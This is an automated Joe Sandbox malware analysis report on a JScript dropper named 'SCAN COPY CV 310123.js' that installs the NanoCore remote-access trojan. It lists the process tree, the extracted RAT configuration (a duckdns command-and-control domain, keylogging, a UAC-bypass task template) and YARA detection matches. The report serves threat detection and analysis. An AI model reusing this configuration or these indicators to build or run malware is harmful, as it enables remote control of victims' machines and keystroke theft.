Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SCAN COPY CV 310123.js

Overview

General Information

Sample Name:SCAN COPY CV 310123.js
Analysis ID:796104
MD5:c1e6f89b24d1304d31dc64015d9bda62
SHA1:27f825c528d3011316720bd8011edfed129b3289
SHA256:06b5465e33770e469fcd576f34f55021df7f348b6b262e8721e23e801629e29e
Tags:jsNanoCoreRAT
Infos:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
JScript performs obfuscated calls to suspicious functions
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected Nanocore RAT
Detected unpacking (creates a PE file in dynamic memory)
Maps a DLL or memory area into another process
.NET source code contains potential unpacker
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • wscript.exe (PID: 2708 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SCAN COPY CV 310123.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • vtvt.exe (PID: 3676 cmdline: "C:\Users\user\AppData\Roaming\vtvt.exe" MD5: 44B48773D128C83DB9ECB979EDDCE364)
      • czkdqe.exe (PID: 4692 cmdline: "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c MD5: 7623E43BAB89AD62BD536D06A1751BB9)
        • czkdqe.exe (PID: 2264 cmdline: C:\Users\user\AppData\Local\Temp\czkdqe.exe MD5: 7623E43BAB89AD62BD536D06A1751BB9)
          • czkdqe.exe (PID: 1372 cmdline: "C:\Users\user\AppData\Local\Temp\czkdqe.exe" MD5: 7623E43BAB89AD62BD536D06A1751BB9)
            • WerFault.exe (PID: 4700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • vktp.exe (PID: 4936 cmdline: "C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exe" "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\ MD5: 7623E43BAB89AD62BD536D06A1751BB9)
    • WerFault.exe (PID: 5392 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 656 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • vktp.exe (PID: 2160 cmdline: "C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exe" "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\ MD5: 7623E43BAB89AD62BD536D06A1751BB9)
    • WerFault.exe (PID: 1804 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 628 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
{"Version": "1.2.2.0", "Mutex": "82fe3011-00e2-4a52-9361-cad1a21d", "Group": "bition1", "Domain1": "bition.duckdns.org", "Domain2": "bition.duckdns.org", "Port": 8817, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "bition.duckdns.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x4318d:$a: NanoCore
    • 0x431e6:$a: NanoCore
    • 0x43223:$a: NanoCore
    • 0x4329c:$a: NanoCore
    • 0x56947:$a: NanoCore
    • 0x5695c:$a: NanoCore
    • 0x56991:$a: NanoCore
    • 0x6f94b:$a: NanoCore
    • 0x6f960:$a: NanoCore
    • 0x6f995:$a: NanoCore
    • 0x431ef:$b: ClientPlugin
    • 0x4322c:$b: ClientPlugin
    • 0x43b2a:$b: ClientPlugin
    • 0x43b37:$b: ClientPlugin
    • 0x56703:$b: ClientPlugin
    • 0x5671e:$b: ClientPlugin
    • 0x5674e:$b: ClientPlugin
    • 0x56965:$b: ClientPlugin
    • 0x5699a:$b: ClientPlugin
    • 0x6f707:$b: ClientPlugin
    • 0x6f722:$b: ClientPlugin
    00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Nanocore_d8c4e3c5unknownunknown
    • 0x43223:$a1: NanoCore.ClientPluginHost
    • 0x56991:$a1: NanoCore.ClientPluginHost
    • 0x6f995:$a1: NanoCore.ClientPluginHost
    • 0x431e6:$a2: NanoCore.ClientPlugin
    • 0x5695c:$a2: NanoCore.ClientPlugin
    • 0x6f960:$a2: NanoCore.ClientPlugin
    • 0x435ba:$b1: get_BuilderSettings
    • 0x5b8d7:$b1: get_BuilderSettings
    • 0x748db:$b1: get_BuilderSettings
    • 0x43271:$b4: IClientAppHost
    • 0x4362b:$b6: AddHostEntry
    • 0x4369a:$b7: LogClientException
    • 0x5b846:$b7: LogClientException
    • 0x7484a:$b7: LogClientException
    • 0x4360f:$b8: PipeExists
    • 0x4325e:$b9: IClientLoggingHost
    • 0x569ab:$b9: IClientLoggingHost
    • 0x6f9af:$b9: IClientLoggingHost
    00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
    • 0x146bd:$x1: NanoCore.ClientPluginHost
    • 0x146fa:$x2: IClientNetworkHost
    • 0x1822d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 26 entries
      SourceRuleDescriptionAuthorStrings
      3.2.czkdqe.exe.36631e4.8.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
      • 0xd9ad:$x1: NanoCore.ClientPluginHost
      • 0xd9da:$x2: IClientNetworkHost
      3.2.czkdqe.exe.36631e4.8.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth (Nextron Systems)
      • 0xd9ad:$x2: NanoCore.ClientPluginHost
      • 0xea88:$s4: PipeCreated
      • 0xd9c7:$s5: IClientLoggingHost
      3.2.czkdqe.exe.36631e4.8.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        3.2.czkdqe.exe.36631e4.8.unpackMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
        • 0xd978:$x2: NanoCore.ClientPlugin
        • 0xd9ad:$x3: NanoCore.ClientPluginHost
        • 0xd96c:$i2: IClientData
        • 0xd98e:$i3: IClientNetwork
        • 0xd99d:$i5: IClientDataHost
        • 0xd9c7:$i6: IClientLoggingHost
        • 0xd9da:$i7: IClientNetworkHost
        • 0xd9ed:$i8: IClientUIHost
        • 0xd9fb:$i9: IClientNameObjectCollection
        • 0xda17:$i10: IClientReadOnlyNameObjectCollection
        • 0xd76a:$s1: ClientPlugin
        • 0xd981:$s1: ClientPlugin
        • 0x129a2:$s6: get_ClientSettings
        3.2.czkdqe.exe.36631e4.8.unpackWindows_Trojan_Nanocore_d8c4e3c5unknownunknown
        • 0xd9ad:$a1: NanoCore.ClientPluginHost
        • 0xd978:$a2: NanoCore.ClientPlugin
        • 0x128f3:$b1: get_BuilderSettings
        • 0x12862:$b7: LogClientException
        • 0xd9c7:$b9: IClientLoggingHost
        Click to see the 80 entries

        AV Detection

        barindex
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\czkdqe.exe, ProcessId: 2264, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        E-Banking Fraud

        barindex
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\czkdqe.exe, ProcessId: 2264, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Stealing of Sensitive Information

        barindex
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\czkdqe.exe, ProcessId: 2264, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Remote Access Functionality

        barindex
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\czkdqe.exe, ProcessId: 2264, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: SCAN COPY CV 310123.jsReversingLabs: Detection: 46%
        Source: SCAN COPY CV 310123.jsAvira: detected
        Source: bition.duckdns.orgAvira URL Cloud: Label: malware
        Source: Yara matchFile source: 3.2.czkdqe.exe.36631e4.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.23a0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.23a0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.366780d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.35e5530.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.36631e4.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.804368.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.417058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.4920000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.365e3ae.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.804368.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.35e5530.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.417058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: czkdqe.exe PID: 2264, type: MEMORYSTR
        Source: C:\Users\user\AppData\Roaming\vtvt.exeJoe Sandbox ML: detected
        Source: 3.2.czkdqe.exe.4920000.9.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 3.2.czkdqe.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 0.2.wscript.exe.1dd81520090.0.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "82fe3011-00e2-4a52-9361-cad1a21d", "Group": "bition1", "Domain1": "bition.duckdns.org", "Domain2": "bition.duckdns.org", "Port": 8817, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "bition.duckdns.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

        Compliance

        barindex
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeUnpacked PE file: 3.2.czkdqe.exe.4920000.9.unpack
        Source: Binary string: C:\xampp\htdocs\461bf42fac7a4a3490fbb99afbf96035\Loader\Release\Loader.pdb source: vtvt.exe, 00000001.00000002.337727248.000000000288B000.00000004.00000020.00020000.00000000.sdmp, vtvt.exe, 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmp, czkdqe.exe, 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmp, czkdqe.exe, 00000002.00000002.333726031.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, czkdqe.exe, 00000002.00000000.320751259.0000000000410000.00000002.00000001.01000000.00000007.sdmp, czkdqe.exe, 00000003.00000000.323642600.0000000000410000.00000002.00000001.01000000.00000007.sdmp, czkdqe.exe, 00000008.00000000.340427652.0000000000410000.00000002.00000001.01000000.00000007.sdmp, czkdqe.exe, 00000008.00000002.358024997.0000000000410000.00000002.00000001.01000000.00000007.sdmp, vktp.exe, 0000000A.00000000.342875456.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, vktp.exe, 0000000A.00000002.358495573.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, vktp.exe, 00000010.00000000.360882520.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, vktp.exe, 00000010.00000002.367294626.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, vktp.exe.2.dr, czkdqe.exe.1.dr, nsg14BD.tmp.1.dr
        Source: Binary string: wntdll.pdbUGP source: czkdqe.exe, 00000002.00000003.328982174.000000001A3D0000.00000004.00001000.00020000.00000000.sdmp, czkdqe.exe, 00000002.00000003.328542810.000000001A510000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: czkdqe.exe, 00000002.00000003.328982174.000000001A3D0000.00000004.00001000.00020000.00000000.sdmp, czkdqe.exe, 00000002.00000003.328542810.000000001A510000.00000004.00001000.00020000.00000000.sdmp
        Source: C:\Users\user\AppData\Roaming\vtvt.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D74
        Source: C:\Users\user\AppData\Roaming\vtvt.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,1_2_0040699E
        Source: C:\Users\user\AppData\Roaming\vtvt.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 3_2_00406715 FindFirstFileExW,3_2_00406715

        Networking

        barindex
        Source: Malware configuration extractorURLs: bition.duckdns.org
        Source: wscript.exe, 00000000.00000003.320076363.000001DDFE405000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.325020918.000001DD81520000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.317670547.000001DD806AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.319848933.000001DD80650000.00000004.00000020.00020000.00000000.sdmp, vtvt.exe, 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmp, vtvt.exe, 00000001.00000000.319796185.000000000040A000.00000008.00000001.01000000.00000006.sdmp, vtvt.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: czkdqe.exe, 00000003.00000002.342122347.0000000002630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
        Source: czkdqe.exe, 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevices
        Source: C:\Users\user\AppData\Roaming\vtvt.exeCode function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405809

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 3.2.czkdqe.exe.36631e4.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.23a0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.23a0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.366780d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.35e5530.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.36631e4.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.804368.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.417058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.4920000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.365e3ae.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.804368.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.35e5530.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.417058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: czkdqe.exe PID: 2264, type: MEMORYSTR

        System Summary

        barindex
        Source: 3.2.czkdqe.exe.36631e4.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 3.2.czkdqe.exe.36631e4.8.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.36631e4.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.23a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 3.2.czkdqe.exe.23a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.23a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.czkdqe.exe.23a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.23a0000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 3.2.czkdqe.exe.23a0000.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.23a0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.czkdqe.exe.23a0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 3.2.czkdqe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.czkdqe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.366780d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 3.2.czkdqe.exe.366780d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.366780d.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.35e5530.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 3.2.czkdqe.exe.35e5530.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.35e5530.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.czkdqe.exe.35e5530.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.36631e4.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 3.2.czkdqe.exe.36631e4.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.36631e4.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.804368.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 3.2.czkdqe.exe.804368.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.804368.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.czkdqe.exe.804368.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 3.2.czkdqe.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.czkdqe.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.4920000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 3.2.czkdqe.exe.4920000.9.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.4920000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.czkdqe.exe.4920000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.365e3ae.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
